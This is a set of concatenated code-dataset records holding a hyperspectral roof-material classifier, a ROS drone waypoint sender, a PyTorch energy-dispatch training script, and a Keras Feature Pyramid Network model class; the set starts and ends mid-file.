spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/SWIR30cm/2021_04_swir30cm.hdr\")\n\nvnir = spectral.SpyFile.load(vnir_raw)\nswir = spectral.SpyFile.load(swir_raw)\n\nhs = np.dstack([vnir, swir])\n\nplt.imshow(np.dstack([hs[:,:,76],hs[:,:,46],hs[:,:,21]])/2500)\n\n# =============================================================================\n# Plot area image with nice colors\n# =============================================================================\n\nclasses = [\"None\", \"black concrete\", \"metal roofing\", \"black ceramic\", \"brown concrete\", \n \"red concrete\", \"gravel\", \"green ceramic\", \"pcv\", \"tar roofing paper\"]\ncolormap = ListedColormap([\"black\", \"red\", \"green\", \"yellow\", \"cyan\", \"maroon\",\n \"magenta\", \"seagreen\", \"purple\", \"blue\"])\nfig, ax = plt.subplots()\nimg = ax.imshow(area, cmap=colormap)\nplt.show()\n\n\n# =============================================================================\n# Take out pixels of interests\n# =============================================================================\n\nhs[area==0]=0\n\nX = hs[hs[:,:,0]!=0]\ny = area[area!=0]\n\n# =============================================================================\n# Machine learning\n# =============================================================================\nlr = LogisticRegression()\nsvc = SVC()\nknn = KNeighborsClassifier()\nrf = RandomForestClassifier()\n\nfor estimator, name in [(lr, \"lr\"),\n (svc, \"svc\"),\n (knn, \"knn\"),\n (rf, \"rf\")]:\n pl = make_pipeline(#StandardScaler(), \n PCA(n_components=10),\n estimator)\n \n pl.fit(X,y)\n print(f\"{name}: {pl.score(X,y)}\")\n# lr = LogisticRegression(C=1)\n# lr.fit(X,\n# y)\n\n# rf = RandomForestClassifier(verbose=1)\n# rf.fit(X,\n# y)\n\n# =============================================================================\n# C for lr\n# =============================================================================\nC = [2,3,4,5,10,50,100]\nfor c in C:\n lr = LogisticRegression()\n pl = make_pipeline(#StandardScaler(), \n PCA(n_components=c),\n lr)\n \n pl.fit(X,y)\n print(c, pl.score(X,y))\n\n\n# =============================================================================\n# Predict\n# =============================================================================\n\n\npred = pl.predict(hs.reshape((hs.shape[0]*hs.shape[1],\n hs.shape[2]))).reshape(hs.shape[0],hs.shape[1])\n\npred[roofs<0.01] = 0\nplt.imshow(pred, cmap=colormap)\n\n\n# =============================================================================\n# Only use field work as pred\n# =============================================================================\n\narea = np.array(area)\narea[roofs<0.01] = 10\narea += 1\narea[area==11] = 0\nplt.imshow(area) \n\nnp.save(\"roof_map.npy\", area)\n\n\n\n","repo_name":"stianteien/M_DV_V2022","sub_path":"spectral_library/ml_fieldspeclib.py","file_name":"ml_fieldspeclib.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4386205095","text":"#!/usr/bin/env python\n\nimport math\nimport os\nimport time\nimport rospy\nimport rosgraph\nfrom geometry_msgs.msg import PoseStamped\nfrom snapstack_msgs.msg import State\nimport numpy as np\nfrom random import * \n\nclass TermGoalSender:\n\n def __init__(self):\n\n # home yet?\n self.is_home = False\n\n # position change\n self.sign = 1\n\n # initialization done?\n self.is_init_pos = False\n\n # reached goal?\n self.if_arrived = False\n\n # term_goal init\n self.term_goal=PoseStamped()\n self.term_goal.header.frame_id='world'\n self.pubTermGoal = rospy.Publisher('term_goal', PoseStamped, queue_size=1, latch=True)\n \n # state_pos init ()\n self.state_pos=np.array([0.0, 0.0, 0.0])\n\n # waypoints\n self.wpidx = 0\n self.wps = np.array([\n [-3.0, 3.0, 2.0],\n [3.0, -3.0, 2.0]\n ])\n\n # every 10 sec change goals\n rospy.Timer(rospy.Duration(10.0), self.change_goal)\n\n # set initial time and how long the demo is\n self.time_init = rospy.get_rostime()\n self.total_secs = 60.0; # sec\n\n # every 0.01 sec timerCB is called back\n self.is_change_goal = True\n self.timer = rospy.Timer(rospy.Duration(0.01), self.timerCB)\n\n # send goal\n self.sendGoal()\n\n def change_goal(self, tmp):\n self.is_change_goal = True\n \n\n def timerCB(self, tmp):\n \n # check if we should go home\n duration = rospy.get_rostime() - self.time_init\n if (duration.to_sec() > self.total_secs and not self.is_home):\n self.is_home = True\n self.sendGoal()\n\n # term_goal in array form\n self.term_goal_pos=np.array([self.term_goal.pose.position.x,self.term_goal.pose.position.y,self.term_goal.pose.position.z])\n\n # distance\n dist=np.linalg.norm(self.term_goal_pos-self.state_pos)\n #print(\"dist=\", dist)\n\n # check distance and if it's close enough publish new term_goal\n dist_limit = 0.5\n if (dist < dist_limit):\n if not self.is_home:\n self.sendGoal()\n\n def sendGoal(self):\n\n if self.is_home:\n \n print (\"Home Return\")\n # set home goals\n self.term_goal.pose.position.x = self.init_pos[0]\n self.term_goal.pose.position.y = self.init_pos[1]\n self.term_goal.pose.position.z = 1.8\n\n else: \n\n # set goals (exact position exchange, this could lead to drones going to exact same locations)\n self.term_goal.pose.position.x = self.wps[self.wpidx % 2][0]\n self.term_goal.pose.position.y = self.wps[self.wpidx % 2][1]\n self.term_goal.pose.position.z = self.wps[self.wpidx % 2][2] \n\n self.if_arrived = not self.if_arrived\n self.wpidx += 1\n\n self.pubTermGoal.publish(self.term_goal)\n\n return\n\n def stateCB(self, data):\n if not self.is_init_pos:\n self.init_pos = np.array([data.pos.x, data.pos.y, data.pos.z])\n self.is_init_pos = True\n\n self.state_pos = np.array([data.pos.x, data.pos.y, data.pos.z])\n\ndef startNode():\n c = TermGoalSender()\n rospy.Subscriber(\"state\", State, c.stateCB)\n rospy.spin()\n\nif __name__ == '__main__':\n rospy.init_node('TermGoalSender')\n startNode()","repo_name":"mit-acl/puma","sub_path":"puma/scripts/hw_goal.py","file_name":"hw_goal.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"42589426322","text":"#pytorch tests\nimport numpy as np \nimport xlrd\nimport torch\n\ndtype = torch.float\n#device = torch.device(\"cpu\")\ndevice = torch.device(\"cuda:0\")\n\n\nload_e = []\nload_h = []\nload_c = []\nt_db = []\nirrad = []\n\nwb = xlrd.open_workbook('Campus_loads_weather.xlsx')\nsheet = wb.sheet_by_index(0)\ninputs= torch.zeros(sheet.nrows-3,5, device=device, dtype=dtype)\nfor row in range(2,sheet.nrows-1):\n inputs[row-2,0] = sheet.cell_value(row,1)/sheet.cell_value(1,6)#E_dem\n inputs[row-2,1] = sheet.cell_value(row,2)/sheet.cell_value(1,7)#H_dem\n inputs[row-2,2] = sheet.cell_value(row,3)/sheet.cell_value(1,8)#C_dem\n inputs[row-2,3] = sheet.cell_value(row,4)/sheet.cell_value(1,9)#Temp_db_C\n inputs[row-2,4] = sheet.cell_value(row,5)/sheet.cell_value(1,10)#Direct_normal_irradiance\n # load_e.append(row)\n # load_h.append(row[1])\n # load_c.append(row[2])\n # t_db.append(row[3])\n # irrad.append(row[4])\n # inputs.append(row)\n\nprint('inputs read')\n\nwb = xlrd.open_workbook('Campus_MI_18component.xlsx')\nsheet = wb.sheet_by_index(0)\ndisp = torch.zeros(sheet.nrows-2,14, device=device, dtype=dtype)\nfor row in range(1,sheet.nrows-1):\n r = row-1\n disp[r,0] = sheet.cell_value(row,2)/7000#GT1\n disp[r,1] = sheet.cell_value(row,3)/5000#GT2\n disp[r,2] = sheet.cell_value(row,4)/2000#FC1\n disp[r,3] = sheet.cell_value(row,5)/2000#FC2\n disp[r,4] = sheet.cell_value(row,6)/500#sGT\n disp[r,5] = sheet.cell_value(row,7)/1500#Diesel\n disp[r,6] = sheet.cell_value(row,8)/20000#Heater\n disp[r,7] = sheet.cell_value(row,9)/10000#chiller1\n disp[r,8] = sheet.cell_value(row,10)/10000#chiller2\n disp[r,9] = sheet.cell_value(row,11)/7500#small Chiller1\n disp[r,10] = sheet.cell_value(row,12)/7500#small Chiller2\n disp[r,11] = sheet.cell_value(row,13)/30000#battery\n disp[r,12] = sheet.cell_value(row,14)/75000#hot water tank\n disp[r,13] = sheet.cell_value(row,15)/20000#cold water tank\n\nprint('outputs read')\n\n\n# disp = []\n# with open('Campus_MI_18component.xlsx') as csvfile:\n# dispreader = csv.reader(csvfile)\n# for row in loadreader:\n# disp.append(row)\n\n#batch size, input dimension hidden dimension, output dimension\nN, D_in, H, D_out = len(inputs[:,0]), len(inputs[0,:]), int(np.ceil(len(inputs[0,:])+len(disp[0,:])/2)), len(disp[0,:])\n\nx = inputs\ny = disp\nw1 = torch.randn(D_in, H, device=device, dtype=dtype, requires_grad=True)\nw3 = torch.randn(H, D_out, device=device, dtype=dtype, requires_grad=True)\nw2 = torch.randn(H,H, device=device, dtype=dtype, requires_grad=True)\n\nlearning_rate = 1e-6\nfor t in range(100000):\n #forward:\n y_pred = x.mm(w1).clamp(min=0).mm(w2).clamp(min=0).mm(w3)\n #Forward pass: compute predicted dispatch\n # h = x.mm(w1)\n # h_relu = h.clamp(min=0)\n # y_pred = h_relu.mm(w2)\n\n # #compute and print loss\n # loss = (y_pred-y).pow(2).sum().item()\n # print(t,loss)\n loss = (y_pred-y).pow(2).sum()\n print(t, loss.item())\n\n # #Backprop to compute gradients of w1 and w2 with respect to loss\n # grad_y_pred = 2.0*(y_pred-y)\n # grad_w2 = h_relu.t().mm(grad_y_pred)\n # grad_h_relu = grad_y_pred.mm(w2.t())\n # grad_h = grad_h_relu.clone()\n # grad_h[h <0] =0\n # grad_w1 = x.t().mm(grad_h)\n loss.backward()\n\n # #update weights\n # w1 -= learning_rate * grad_w1\n # w2 -= learning_rate*grad_w2\n with torch.no_grad():\n w1 -= learning_rate*w1.grad\n w2 -= learning_rate*w2.grad\n w3 -= learning_rate*w3.grad\n\n #manually zero the gradients after updating weights\n w1.grad.zero_()\n w2.grad.zero_()\n w3.grad.zero_()\n\n","repo_name":"nadiavp/NeuralNetwork","sub_path":"NN_for_dispatch/test_pytorch.py","file_name":"test_pytorch.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38457666979","text":"from keras.models import *\r\nfrom keras.layers import *\r\nfrom fpn_network import ResNet, DataGenerator\r\nimport tensorflow as tf\r\nfrom fpn_network import model_utils\r\nimport os\r\nimport re\r\nimport datetime\r\nfrom fpn_network import utils\r\nfrom fpn_network.ProposalLayer import ProposalLayer\r\nfrom fpn_network.DetectionLayer import DetectionLayer\r\nfrom fpn_network.DetectionTargetLayer import DetectionTargetLayer\r\nfrom fpn_network import FeaturePyramidNetwork\r\nfrom fpn_network import Loss_Functions\r\nfrom fpn_network import RegionProposalNetwork\r\nimport keras\r\nimport multiprocessing\r\n\r\n\r\ndef log(text, array=None):\r\n \"\"\"Prints a text message. And, optionally, if a Numpy array is provided it\r\n prints it's shape, min, and max values.\r\n \"\"\"\r\n if array is not None:\r\n text = text.ljust(25)\r\n text += (\"shape: {:20} min: {:10.5f} max: {:10.5f} {}\".format(\r\n str(array.shape),\r\n array.min() if array.size else \"\",\r\n array.max() if array.size else \"\",\r\n array.dtype))\r\n print(text)\r\n\r\n\r\nclass FPN():\r\n def __init__(self, mode, config, model_dir):\r\n self.mode = mode\r\n self.config = config\r\n self.model_dir = model_dir\r\n self.set_log_dir()\r\n self.keras_model = self.build_model(mode=mode, config=config)\r\n\r\n def build_model(self, mode, config):\r\n # resnet_arch = \"resnet101\"\r\n # use_stage_5 = True\r\n # train_bn = False, Using small batch size\r\n\r\n assert mode in ['training', 'inference']\r\n\r\n input_image = Input(shape=(None, None, 3), name=\"input_image\")\r\n input_image_meta = Input(shape=[config.IMAGE_META_SIZE], name=\"input_image_meta\")\r\n\r\n if mode == \"training\":\r\n # RPN GT\r\n input_rpn_match = Input(\r\n shape=[None, 1], name=\"input_rpn_match\", dtype=tf.int32)\r\n input_rpn_bbox = Input(\r\n shape=[None, 4], name=\"input_rpn_bbox\", dtype=tf.float32)\r\n\r\n # Detection GT (class IDs, bounding boxes, and masks)\r\n # 1. GT Class IDs (zero padded)\r\n input_gt_class_ids = Input(\r\n shape=[None], name=\"input_gt_class_ids\", dtype=tf.int32)\r\n # 2. GT Boxes in pixels (zero padded)\r\n # [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates\r\n input_gt_boxes = Input(\r\n shape=[None, 4], name=\"input_gt_boxes\", dtype=tf.float32)\r\n # Normalize coordinates\r\n gt_boxes = Lambda(lambda x: model_utils.norm_boxes_graph(\r\n x, K.shape(input_image)[1:3]))(input_gt_boxes)\r\n elif mode == \"inference\":\r\n # Anchors in normalized coordinates\r\n input_anchors = Input(shape=[None, 4], name=\"input_anchors\")\r\n\r\n # Build the shared convolutional layers.\r\n # Bottom-up Layers\r\n # Returns a list of the last layers of each stage, 5 in total.\r\n # Don't create the thead (stage 5), so we pick the 4th item in the list.\r\n if callable(config.BACKBONE):\r\n _, C2, C3, C4, C5 = config.BACKBONE(input_image, stage5=True,\r\n train_bn=config.TRAIN_BN)\r\n else:\r\n _, C2, C3, C4, C5 = ResNet.resnet_graph(input_image, config.BACKBONE,\r\n stage5=True, train_bn=config.TRAIN_BN)\r\n\r\n # Top-down Layers\r\n P5 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c5p5')(C5)\r\n P4 = Add(name=\"fpn_p4add\")([UpSampling2D(size=(2, 2), name=\"fpn_p5upsampled\")(P5),\r\n Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c4p4')(C4)])\r\n P3 = Add(name=\"fpn_p3add\")([UpSampling2D(size=(2, 2), name=\"fpn_p4upsampled\")(P4),\r\n Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c3p3')(C3)])\r\n P2 = Add(name=\"fpn_p2add\")([UpSampling2D(size=(2, 2), name=\"fpn_p3upsampled\")(P3),\r\n Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (1, 1), name='fpn_c2p2')(C2)])\r\n\r\n # Attach 3x3 conv to all P layers to get the final feature maps.\r\n P2 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p2\")(P2)\r\n P3 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p3\")(P3)\r\n P4 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p4\")(P4)\r\n P5 = Conv2D(config.TOP_DOWN_PYRAMID_SIZE, (3, 3), padding=\"SAME\", name=\"fpn_p5\")(P5)\r\n # P6 is used for the 5th anchor scale in RPN. Generated by\r\n # subsampling from P5 with stride of 2.\r\n P6 = MaxPooling2D(pool_size=(1, 1), strides=2, name=\"fpn_p6\")(P5)\r\n\r\n # Note that P6 is used in RPN, but not in the classifier heads.\r\n rpn_feature_maps = [P2, P3, P4, P5, P6]\r\n feat_pyr_net_feature_maps = [P2, P3, P4, P5]\r\n\r\n # Anchors\r\n if mode == \"training\":\r\n anchors = self.get_anchors(config.IMAGE_SHAPE)\r\n # Duplicate across the batch dimension because Keras requires it\r\n anchors = np.broadcast_to(anchors, (config.BATCH_SIZE,) + anchors.shape)\r\n # A hack to get around Keras's bad support for constants\r\n anchors = Lambda(lambda x: tf.Variable(anchors), name=\"anchors\")(input_image)\r\n else:\r\n anchors = input_anchors\r\n\r\n # RPN Model\r\n rpn = RegionProposalNetwork.build_rpn_model(config.RPN_ANCHOR_STRIDE,\r\n len(config.RPN_ANCHOR_RATIOS), config.TOP_DOWN_PYRAMID_SIZE)\r\n # Loop through pyramid layers\r\n layer_outputs = [] # list of lists\r\n for p in rpn_feature_maps:\r\n layer_outputs.append(rpn([p]))\r\n # Concatenate layer outputs\r\n # Convert from list of lists of level outputs to list of lists\r\n # of outputs across levels.\r\n # e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]\r\n output_names = [\"rpn_class_logits\", \"rpn_class\", \"rpn_bbox\"]\r\n outputs = list(zip(*layer_outputs))\r\n outputs = [Concatenate(axis=1, name=n)(list(o))\r\n for o, n in zip(outputs, output_names)]\r\n\r\n rpn_class_logits, rpn_class, rpn_bbox = outputs\r\n\r\n # Generate proposals\r\n # Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates\r\n # and zero padded.\r\n proposal_count = config.POST_NMS_ROIS_TRAINING if mode == \"training\" \\\r\n else config.POST_NMS_ROIS_INFERENCE\r\n rpn_rois = ProposalLayer(\r\n proposal_count=proposal_count,\r\n nms_threshold=config.RPN_NMS_THRESHOLD,\r\n name=\"ROI\",\r\n config=config)([rpn_class, rpn_bbox, anchors])\r\n\r\n if mode == \"training\":\r\n # Class ID mask to mark class IDs supported by the dataset the image\r\n # came from.\r\n active_class_ids = Lambda(\r\n lambda x: model_utils.parse_image_meta_graph(x)[\"active_class_ids\"]\r\n )(input_image_meta)\r\n\r\n if not config.USE_RPN_ROIS:\r\n # Ignore predicted ROIs and use ROIs provided as an input.\r\n input_rois = Input(shape=[config.POST_NMS_ROIS_TRAINING, 4],\r\n name=\"input_roi\", dtype=np.int32)\r\n # Normalize coordinates\r\n target_rois = Lambda(lambda x: model_utils.norm_boxes_graph(\r\n x, K.shape(input_image)[1:3]))(input_rois)\r\n else:\r\n target_rois = rpn_rois\r\n\r\n # Generate detection targets\r\n # Subsamples proposals and generates target outputs for training\r\n # Note that proposal class IDs, gt_boxes, and gt_masks are zero\r\n # padded. Equally, returned rois and targets are zero padded.\r\n rois, target_class_ids, target_bbox = \\\r\n DetectionTargetLayer(config, name=\"proposal_targets\")([\r\n target_rois, input_gt_class_ids, gt_boxes])\r\n\r\n # Network Heads\r\n # TODO: verify that this handles zero padded ROIs\r\n feat_pyr_net_class_logits, feat_pyr_net_class, feat_pyr_net_bbox = \\\r\n FeaturePyramidNetwork.fpn_classifier_graph(rois, feat_pyr_net_feature_maps, input_image_meta,\r\n config.POOL_SIZE, config.NUM_CLASSES,\r\n train_bn=config.TRAIN_BN,\r\n fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)\r\n\r\n # TODO: clean up (use tf.identify if necessary)\r\n output_rois = Lambda(lambda x: x * 1, name=\"output_rois\")(rois)\r\n\r\n # Losses\r\n rpn_class_loss = Lambda(lambda x: Loss_Functions.rpn_class_loss_graph(*x), name=\"rpn_class_loss\")(\r\n [input_rpn_match, rpn_class_logits])\r\n rpn_bbox_loss = Lambda(lambda x: Loss_Functions.rpn_bbox_loss_graph(config, *x), name=\"rpn_bbox_loss\")(\r\n [input_rpn_bbox, input_rpn_match, rpn_bbox])\r\n class_loss = Lambda(lambda x: Loss_Functions.feat_pyr_net_class_loss_graph(*x),\r\n name=\"feat_pyr_net_class_loss\")(\r\n [target_class_ids, feat_pyr_net_class_logits, active_class_ids])\r\n bbox_loss = Lambda(lambda x: Loss_Functions.feat_pyr_net_bbox_loss_graph(*x),\r\n name=\"feat_pyr_net_bbox_loss\")(\r\n [target_bbox, target_class_ids, feat_pyr_net_bbox])\r\n\r\n # Model\r\n inputs = [input_image, input_image_meta,\r\n input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes]\r\n if not config.USE_RPN_ROIS:\r\n inputs.append(input_rois)\r\n outputs = [rpn_class_logits, rpn_class, rpn_bbox,\r\n feat_pyr_net_class_logits, feat_pyr_net_class, feat_pyr_net_bbox,\r\n rpn_rois, output_rois,\r\n rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss]\r\n model = Model(inputs, outputs, name='fpn_model')\r\n else:\r\n\r\n # Network Heads\r\n # Proposal classifier and BBox regressor heads\r\n feat_pyr_net_class_logits, feat_pyr_net_class, feat_pyr_net_bbox = \\\r\n FeaturePyramidNetwork.fpn_classifier_graph(rpn_rois, feat_pyr_net_feature_maps, input_image_meta,\r\n config.POOL_SIZE, config.NUM_CLASSES,\r\n train_bn=config.TRAIN_BN,\r\n fc_layers_size=config.FPN_CLASSIF_FC_LAYERS_SIZE)\r\n\r\n # Detections\r\n # output is [batch, num_detections, (y1, x1, y2, x2, class_id, score)] in\r\n # normalized coordinates\r\n detections = DetectionLayer(config, name=\"feat_pyr_net_detection\")(\r\n [rpn_rois, feat_pyr_net_class, feat_pyr_net_bbox, input_image_meta])\r\n\r\n model = Model([input_image, input_image_meta, input_anchors],\r\n [detections, feat_pyr_net_class, feat_pyr_net_bbox,\r\n rpn_rois, rpn_class, rpn_bbox, P2, P3, P4, P5],\r\n name='fpn_model')\r\n\r\n # # Add multi-GPU support.\r\n # if config.GPU_COUNT > 1:\r\n # from fpn.parallel_model import ParallelModel\r\n # model = ParallelModel(model, config.GPU_COUNT)\r\n\r\n return model\r\n\r\n def get_anchors(self, image_shape):\r\n \"\"\"Returns anchor pyramid for the given image size.\"\"\"\r\n backbone_shapes = model_utils.compute_backbone_shapes(self.config, image_shape)\r\n # Cache anchors and reuse if image shape is the same\r\n if not hasattr(self, \"_anchor_cache\"):\r\n self._anchor_cache = {}\r\n if not tuple(image_shape) in self._anchor_cache:\r\n # Generate Anchors\r\n a = utils.generate_pyramid_anchors(\r\n self.config.RPN_ANCHOR_SCALES,\r\n self.config.RPN_ANCHOR_RATIOS,\r\n backbone_shapes,\r\n self.config.BACKBONE_STRIDES,\r\n self.config.RPN_ANCHOR_STRIDE)\r\n # Keep a copy of the latest anchors in pixel coordinates because\r\n # it's used in inspect_model notebooks.\r\n # TODO: Remove this after the notebook are refactored to not use it\r\n self.anchors = a\r\n # Normalize coordinates\r\n self._anchor_cache[tuple(image_shape)] = utils.norm_boxes(a, image_shape[:2])\r\n return self._anchor_cache[tuple(image_shape)]\r\n\r\n def set_log_dir(self, model_path=None):\r\n \"\"\"Sets the model log directory and epoch counter.\r\n\r\n model_path: If None, or a format different from what this code uses\r\n then set a new log directory and start epochs from 0. Otherwise,\r\n extract the log directory and the epoch counter from the file\r\n name.\r\n \"\"\"\r\n # Set date and epoch counter as if starting a new model\r\n self.epoch = 0\r\n now = datetime.datetime.now()\r\n\r\n # TODO: Update for FPN Train Continue\r\n # If we have a model path with date and epochs use them\r\n if model_path:\r\n # Continue from we left of. Get epoch and date from the file name\r\n # A sample model path might look like:\r\n # /path/to/logs/coco20171029T2315/mask_rcnn_coco_0001.h5\r\n regex = r\".*/[\\w-]+(\\d{4})(\\d{2})(\\d{2})T(\\d{2})(\\d{2})/fpn\\_[\\w-]+(\\d{4})\\.h5\"\r\n m = re.match(regex, model_path)\r\n if m:\r\n now = datetime.datetime(int(m.group(1)), int(m.group(2)), int(m.group(3)),\r\n int(m.group(4)), int(m.group(5)))\r\n # Epoch number in file is 1-based, and in Keras code it's 0-based.\r\n # So, adjust for that then increment by one to start from the next epoch\r\n self.epoch = int(m.group(6)) - 1 + 1\r\n print('Re-starting from epoch %d' % self.epoch)\r\n\r\n # Directory for training logs\r\n self.log_dir = os.path.join(self.model_dir, \"{}{:%Y%m%dT%H%M}\".format(\r\n self.config.NAME.lower(), now))\r\n\r\n # Create log_dir if not exists\r\n if not os.path.exists(self.log_dir):\r\n os.makedirs(self.log_dir)\r\n\r\n # Path to save after each epoch. Include placeholders that get filled by Keras.\r\n self.checkpoint_path = os.path.join(self.log_dir, \"fpn_{}_*epoch*.h5\".format(\r\n self.config.NAME.lower()))\r\n self.checkpoint_path = self.checkpoint_path.replace(\"*epoch*\", \"{epoch:04d}\")\r\n\r\n def train(self, train_dataset, val_dataset, learning_rate, epochs, layers,\r\n augmentation=None, custom_callbacks=None):\r\n \"\"\"Train the model.\r\n train_dataset, val_dataset: Training and validation Dataset objects.\r\n learning_rate: The learning rate to train with\r\n epochs: Number of training epochs. Note that previous training epochs\r\n are considered to be done alreay, so this actually determines\r\n the epochs to train in total rather than in this particaular\r\n call.\r\n layers: Allows selecting wich layers to train. It can be:\r\n - A regular expression to match layer names to train\r\n - One of these predefined values:\r\n heads: The RPN, classifier and mask heads of the network\r\n all: All the layers\r\n 3+: Train Resnet stage 3 and up\r\n 4+: Train Resnet stage 4 and up\r\n 5+: Train Resnet stage 5 and up\r\n augmentation: Optional. An imgaug (https://github.com/aleju/imgaug)\r\n augmentation. For example, passing imgaug.augmenters.Fliplr(0.5)\r\n flips images right/left 50% of the time. You can pass complex\r\n augmentations as well. This augmentation applies 50% of the\r\n time, and when it does it flips images right/left half the time\r\n and adds a Gaussian blur with a random sigma in range 0 to 5.\r\n\r\n augmentation = imgaug.augmenters.Sometimes(0.5, [\r\n imgaug.augmenters.Fliplr(0.5),\r\n imgaug.augmenters.GaussianBlur(sigma=(0.0, 5.0))\r\n ])\r\n custom_callbacks: Optional. Add custom callbacks to be called\r\n with the keras fit_generator method. Must be list of type keras.callbacks.\r\n no_augmentation_sources: Optional. List of sources to exclude for\r\n augmentation. A source is string that identifies a dataset and is\r\n defined in the Dataset class.\r\n \"\"\"\r\n assert self.mode == \"training\", \"Create model in training mode.\"\r\n\r\n # Pre-defined layer regular expressions\r\n layer_regex = {\r\n # all layers but the backbone\r\n \"heads\": r\"(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n # From a specific Resnet stage and up\r\n \"3+\": r\"(res3.*)|(bn3.*)|(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n \"4+\": r\"(res4.*)|(bn4.*)|(res5.*)|(bn5.*)|(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n \"5+\": r\"(res5.*)|(bn5.*)|(feat_pyr_net\\_.*)|(rpn\\_.*)|(fpn\\_.*)\",\r\n # All layers\r\n \"all\": \".*\",\r\n }\r\n if layers in layer_regex.keys():\r\n layers = layer_regex[layers]\r\n\r\n print(\"\\n\\nBATCH_SIZE: \", self.config.BATCH_SIZE)\r\n\r\n # Data generators\r\n train_generator = DataGenerator.data_generator(train_dataset, self.config, shuffle=True,\r\n augmentation=augmentation,\r\n batch_size=self.config.BATCH_SIZE)\r\n val_generator = DataGenerator.data_generator(val_dataset, self.config, shuffle=True,\r\n batch_size=self.config.BATCH_SIZE)\r\n\r\n logs_path = self.log_dir + \"/training.log\"\r\n\r\n # Callbacks\r\n callbacks = [\r\n keras.callbacks.TensorBoard(log_dir=self.log_dir,\r\n histogram_freq=0, write_graph=True, write_images=False),\r\n keras.callbacks.ModelCheckpoint(self.checkpoint_path,\r\n verbose=1, save_weights_only=True),\r\n keras.callbacks.CSVLogger(logs_path, separator=\",\", append=True),\r\n ]\r\n\r\n # Add custom callbacks to the list\r\n if custom_callbacks:\r\n callbacks += custom_callbacks\r\n\r\n # Train\r\n log(\"\\nStarting at epoch {}. LR={}\\n\".format(self.epoch, learning_rate))\r\n log(\"Checkpoint Path: {}\".format(self.checkpoint_path))\r\n self.set_trainable(layers)\r\n self.compile(learning_rate, self.config.LEARNING_MOMENTUM)\r\n\r\n # Work-around for Windows: Keras fails on Windows when using\r\n # multiprocessing workers. See discussion here:\r\n # https://github.com/matterport/Mask_RCNN/issues/13#issuecomment-353124009\r\n if os.name is 'nt':\r\n workers = 0\r\n else:\r\n workers = multiprocessing.cpu_count()\r\n\r\n self.keras_model.fit_generator(\r\n train_generator,\r\n initial_epoch=self.epoch,\r\n epochs=epochs,\r\n steps_per_epoch=self.config.STEPS_PER_EPOCH,\r\n callbacks=callbacks,\r\n validation_data=val_generator,\r\n validation_steps=self.config.VALIDATION_STEPS,\r\n max_queue_size=100,\r\n workers=workers,\r\n use_multiprocessing=True,\r\n )\r\n self.epoch = max(self.epoch, epochs)\r\n\r\n def set_trainable(self, layer_regex, keras_model=None, indent=0, verbose=1):\r\n \"\"\"Sets model layers as trainable if their names match\r\n the given regular expression.\r\n \"\"\"\r\n # Print message on the first call (but not on recursive calls)\r\n if verbose > 0 and keras_model is None:\r\n log(\"Selecting layers to train\")\r\n\r\n keras_model = keras_model or self.keras_model\r\n\r\n # In multi-GPU training, we wrap the model. Get layers\r\n # of the inner model because they have the weights.\r\n layers = keras_model.inner_model.layers if hasattr(keras_model, \"inner_model\") \\\r\n else keras_model.layers\r\n\r\n for layer in layers:\r\n # Is the layer a model?\r\n if layer.__class__.__name__ == 'Model':\r\n print(\"In model: \", layer.name)\r\n self.set_trainable(\r\n layer_regex, keras_model=layer, indent=indent + 4)\r\n continue\r\n\r\n if not layer.weights:\r\n continue\r\n # Is it trainable?\r\n trainable = bool(re.fullmatch(layer_regex, layer.name))\r\n # Update layer. If layer is a container, update inner layer.\r\n if layer.__class__.__name__ == 'TimeDistributed':\r\n layer.layer.trainable = trainable\r\n else:\r\n layer.trainable = trainable\r\n # Print trainable layer names\r\n if trainable and verbose > 0:\r\n log(\"{}{:20} ({})\".format(\" \" * indent, layer.name,\r\n layer.__class__.__name__))\r\n\r\n def compile(self, learning_rate, momentum):\r\n \"\"\"Gets the model ready for training. Adds losses, regularization, and\r\n metrics. Then calls the Keras compile() function.\r\n \"\"\"\r\n # Optimizer object\r\n optimizer = keras.optimizers.SGD(\r\n lr=learning_rate, momentum=momentum,\r\n clipnorm=self.config.GRADIENT_CLIP_NORM)\r\n\r\n # optimizer = keras.optimizers.Adam(lr=learning_rate)\r\n\r\n # Add Losses\r\n # First, clear previously set losses to avoid duplication\r\n self.keras_model._losses = []\r\n self.keras_model._per_input_losses = {}\r\n loss_names = [\r\n \"rpn_class_loss\", \"rpn_bbox_loss\",\r\n \"feat_pyr_net_class_loss\", \"feat_pyr_net_bbox_loss\"]\r\n for name in loss_names:\r\n layer = self.keras_model.get_layer(name)\r\n if layer.output in self.keras_model.losses:\r\n continue\r\n loss = (\r\n tf.reduce_mean(layer.output, keepdims=True)\r\n * self.config.LOSS_WEIGHTS.get(name, 1.))\r\n self.keras_model.add_loss(loss)\r\n\r\n # Add L2 Regularization\r\n # Skip gamma and beta weights of batch normalization layers.\r\n reg_losses = [\r\n 